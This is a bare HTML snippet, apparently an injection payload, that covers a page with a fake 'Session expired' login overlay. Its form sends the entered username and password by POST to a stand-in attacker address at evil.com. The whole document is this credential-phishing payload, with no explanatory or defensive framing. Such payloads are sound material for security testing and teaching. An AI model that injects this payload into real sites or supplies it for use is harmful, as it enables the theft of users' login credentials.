<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999">
<h3>Session expired. Please login again.</h3>
<form action="https://evil.com/steal" method="POST">
Username: <input name="u"><br>
Password: <input name="p" type="password"><br>
<button>Login</button>
</form>
</div>